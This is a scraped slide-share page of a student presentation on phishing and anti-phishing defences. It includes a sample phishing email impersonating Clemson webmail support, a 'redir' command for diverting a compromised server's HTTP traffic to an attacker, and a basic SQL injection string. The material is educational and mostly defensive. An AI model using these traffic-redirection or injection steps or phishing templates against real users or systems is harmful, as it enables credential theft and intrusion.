Phishing is a type of cybercrime where someone pretends to be a trusted source to trick people into giving away sensitive information. Anti-phishing is a way to prevent phishing attacks
SachinMore788166
13 views
20 slides
Sep 20, 2024
Slide 1 of 20
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
About This Presentation
phishing and anti phishing
Slide Content
PHISHING AND
ANTI-PHISHING
TECHNIQUES
Sumanth, Sanath and Anil
CpSc 620
ANTI-PHISHING
TECHNIQUES
Sumanth, Sanath and Anil
CpSc 620
Email Message
Subject: CONFIRM YOUR ACCOUNT
Reply-To: “CLEMSON.EDU SUPPORT TEAM"
From: "CLEMSON.EDU SUPPORT TEAM“
Date: Tue, 1 Dec 2009 17:42:05 -0400
To: <"Undisclosed-Recipient:;"@iocaine.uits.clemson.edu>
Dear CLEMSON.EDU Webmail user,
This mail is to inform all our {CLEMSON.EDU } webmail users
that we will be maintaining and upgrading our website in a couple of
days from now to a new link. As a Subscriber you are required to click
on the link below and login to check if you have access to the new
link.
Click Here: www.webmail.clemson.edu
Failure to do this will immediately will render your email address
deactivated. Thank you for using CLEMSON.EDU.
CCIT SUPPORT TEAM
Subject: CONFIRM YOUR ACCOUNT
Reply-To: “CLEMSON.EDU SUPPORT TEAM"
From: "CLEMSON.EDU SUPPORT TEAM“
Date: Tue, 1 Dec 2009 17:42:05 -0400
To: <"Undisclosed-Recipient:;"@iocaine.uits.clemson.edu>
Dear CLEMSON.EDU Webmail user,
This mail is to inform all our {CLEMSON.EDU } webmail users
that we will be maintaining and upgrading our website in a couple of
days from now to a new link. As a Subscriber you are required to click
on the link below and login to check if you have access to the new
link.
Click Here: www.webmail.clemson.edu
Failure to do this will immediately will render your email address
deactivated. Thank you for using CLEMSON.EDU.
CCIT SUPPORT TEAM
What is Phishing?
Phishing scams are typically fraudulent email
messages or websites appearing as
legitimate enterprises (e.g., your university,
your Internet service provider, your bank).
These scams attempt to gather personal,
financial and sensitive information.
Derivation of the word “phishing”.
Phishing scams are typically fraudulent email
messages or websites appearing as
legitimate enterprises (e.g., your university,
your Internet service provider, your bank).
These scams attempt to gather personal,
financial and sensitive information.
Derivation of the word “phishing”.
How to phish?
Compromised Web servers – Email and IM
Port Redirection
Botnets
Key loggers
Compromised Web servers – Email and IM
Port Redirection
Botnets
Key loggers
Compromised Web Servers
Attacker
Search for Vulnerable W
eb servers
Install phishing websites
S
e
n
d
B
u
lk E
m
a
il
Compromise
d Web Server
Found
!!
Attacker
Search for Vulnerable W
eb servers
Install phishing websites
S
e
n
d
B
u
lk E
m
a
il
Compromise
d Web Server
Found
!!
Port Redirection
Server is compromised and a program is
loaded
All the port 80 ie., http requests are
redirected to the attacker’s server
Software known as ‘redir’
Execute the software using:
redir --lport=80 –l addr=<IP addr orig server> -cport=80 -caddr=IP addr attacker
Server is compromised and a program is
loaded
All the port 80 ie., http requests are
redirected to the attacker’s server
Software known as ‘redir’
Execute the software using:
redir --lport=80 –l addr=<IP addr orig server> -cport=80 -caddr=IP addr attacker
Using Botnets
Botnets are computers infected by worms
or Trojans and taken over surreptitiously by
hackers and brought into networks to send
spam, more viruses, or launch denial of
service attacks.
Remotely controlled by the attacker.
SQL Injection attacks
Botnets are computers infected by worms
or Trojans and taken over surreptitiously by
hackers and brought into networks to send
spam, more viruses, or launch denial of
service attacks.
Remotely controlled by the attacker.
SQL Injection attacks
SQL Injection attacks
Attacker
Server
http request with sql query
Attack the server with some queries to drop the
tables:
http://localhost/products.asp?productId=0 or 1=1
SQL pattern matching: like '%admin%'
Attacker
Server
http request with sql query
Attack the server with some queries to drop the
tables:
http://localhost/products.asp?productId=0 or 1=1
SQL pattern matching: like '%admin%'
Keyloggers
Keyloggers are designed to monitor all the
key strokes
Hardware
Software
Modified to extract personal information
Keyloggers are designed to monitor all the
key strokes
Hardware
Software
Modified to extract personal information
Current Statistics
Source: http://www.avira.com/
Source: http://www.avira.com/
Anti-phishing
Ways:
Browser Capabilites
Desktop Agents
Token based
Digitally Signed Email
Domain Monitoring
Client Level
Server Level
Enterprise Level
Ways:
Browser Capabilites
Desktop Agents
Token based
Digitally Signed Email
Domain Monitoring
Client Level
Server Level
Enterprise Level
Browser Capabilites
Disable pop ups
Disable Java runtime support
Prevent the storage of non-secure cookies
Ensure that downloads are checked by anti-
virus software
Eg: Mozilla Firefox Verification
Disable pop ups
Disable Java runtime support
Prevent the storage of non-secure cookies
Ensure that downloads are checked by anti-
virus software
Eg: Mozilla Firefox Verification
Browser Capabilites
Desktop Agents
Install Anti-virus software which can
prevent phishing
Personal IDS
Firewall
Toolbars – Google, Yahoo, NetCraft
Install Anti-virus software which can
prevent phishing
Personal IDS
Firewall
Toolbars – Google, Yahoo, NetCraft
Token based Authentication
Token based Authentation
Token based Authentation
Digitally Signed Email
SMTP
Sender
Mail Server
Recipient
Se
n
d
er’s C
e
rt
CA Server
Validate Sender’s Certificate
SMTP
Sender
Mail Server
Recipient
Se
n
d
er’s C
e
rt
CA Server
Validate Sender’s Certificate
Gmail - Verification
Domain Monitoring
Monitor the registration of Internet
domains relating to their organisation and
the expiry of corporate domains
Google - Safe Browsing API
www.phishtank.com
Monitor the registration of Internet
domains relating to their organisation and
the expiry of corporate domains
Google - Safe Browsing API
www.phishtank.com
References
Honeynet Projecy – http://www.honeynet.org
The Phishing Guide
- Understanding and Preventing Phishing attacks
Justice Department - http://www.justice.gov/
Statistics - http://www.avira.com/
Cross-site scripting attacks – http://www.wikipedia.org/
Images from PayPal, Gmail
Demo - Clemson Webmail – Only for Ethical Hacking
RSA Token Authentication - http://www.entrust.com
Honeynet Projecy – http://www.honeynet.org
The Phishing Guide
- Understanding and Preventing Phishing attacks
Justice Department - http://www.justice.gov/
Statistics - http://www.avira.com/
Cross-site scripting attacks – http://www.wikipedia.org/
Images from PayPal, Gmail
Demo - Clemson Webmail – Only for Ethical Hacking
RSA Token Authentication - http://www.entrust.com
Thank You !!!!
Tags
Categories
GeneralDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 13
- Slides 20
- Age 444 days
Related Slideshows
22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
35 views
26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
38 views
31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
34 views
14
Fertility awareness methods for women in the society
Isaiah47
31 views
35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
30 views
5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
31 views